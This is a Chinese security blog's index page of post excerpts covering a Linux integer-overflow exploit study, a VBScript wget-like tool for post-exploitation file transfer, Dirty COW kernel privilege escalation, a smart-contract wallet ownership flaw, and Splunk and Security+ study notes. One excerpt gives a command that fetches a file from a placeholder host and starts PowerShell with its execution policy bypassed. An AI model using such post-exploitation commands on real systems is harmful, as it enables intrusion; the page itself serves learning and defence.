摘要: 学习Linux BOF的时候,看了这个文章,https://sploitfun.wordpress.com/2015/06/23/integer overflow/ ,原文给出的exp无法成功, 此时除了计算并填充buf还可以用其他方法来复现这个问题: !/usr/bin/env python im 阅读全文
posted @ 2018-02-08 21:19 小小leo 阅读(202) 评论(0) 推荐(0) 编辑
摘要: Wget like tool for file transfer when do post exploitation. CODE USAGE cscript wget.vbs http://x.x.x.x filename powershell.exe ExecutionPolicy bypass 阅读全文
posted @ 2018-02-03 08:10 小小leo 阅读(540) 评论(0) 推荐(0) 编辑
摘要: 先写个大概 0. dirtycow 不同的dirtycow有不同执行条件。 使用前先对照此表根据内核版本确认是否已经修复 https://github.com/dirtycow/dirtycow.github.io/wiki/Patched Kernel Versions 比如 https://gi 阅读全文
posted @ 2018-01-29 23:20 小小leo 阅读(1916) 评论(1) 推荐(0) 编辑
摘要: Moesif Origin & CORS Changer 这个插件允许发送跨域请求,重写Request Origin 和 CORS headers。 解决Debug Javascript时候出现blocked by CORS policy日志问题。 下载地址 Moesif Origin & CORS 阅读全文
posted @ 2018-01-13 02:36 小小leo 阅读(8258) 评论(0) 推荐(0) 编辑
摘要: Security+ Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA;是和CISSP、CISA等共同包含在内的国际IT业热门认证之一,和CISSP偏重信息安全管理相比,Security+认证更偏重信息安全技术和操作。 考试资料 1. Security+ St 阅读全文
posted @ 2018-01-12 21:51 小小leo 阅读(8308) 评论(0) 推荐(1) 编辑
摘要: 课程介绍 | 通过 Splunk Fundamentals Part 1 课程考试 | 获取splunk certificate user 证书 | 课程为14节课+课后实验环境+课后习题 | 课程有英文中文日语字幕可选 | 考试为45道题,60分钟 | 免费。 | 通过 Splunk Fundam 阅读全文
posted @ 2017-12-28 15:29 小小leo 阅读(1548) 评论(0) 推荐(0) 编辑
摘要: 学习Splunk Fundamentals Part 2 (IOD) 和 Splunk Fundamentals Part 1课程的笔记。 Chart Over By Tips: ….|chart count over host by product_name usenull=f useother= 阅读全文
posted @ 2017-12-28 15:18 小小leo 阅读(1088) 评论(0) 推荐(0) 编辑
摘要: 有大佬通过博客加我了,分享技术还是有人会看到的,要坚持更新博客,感谢! 过去的一年多总结 这一年多在甲方做了DevOps还有Security两个岗位,白天忙着撕逼晚上做技术性的活,这一年多不论技术和业务都学了很多。 考了EX413,学会SELinux配置奇怪安全策略,配置奇怪的Windows组策略, 阅读全文
posted @ 2017-12-27 23:38 小小leo 阅读(396) 评论(2) 推荐(0) 编辑
摘要: 漏洞原因: 因为initWallet函数是公开函数( public function) , 攻击者调用initWallet,重新初始化钱包会把之前合约钱包所有者覆盖, 即可改变钱包所有者。 漏洞代码: 修复方法: 设置 initMultiowned 和 initDaylimit 禁止外部调用,给in 阅读全文
posted @ 2017-07-20 10:22 小小leo 阅读(970) 评论(0) 推荐(0) 编辑
摘要: 在构建自定义ISO的时候,有时候需要从母体机器拷贝文件到Live CD系统。比如拷贝/home/xiaoxiaoleo/hello 程序,在Kickstart配置文件里, post脚本添加--nochroot参数: 启动机器,加载Live IOS进入系统后,可以在系统目录/app/里看到hello程 阅读全文
posted @ 2017-06-07 15:59 小小leo 阅读(522) 评论(0) 推荐(0) 编辑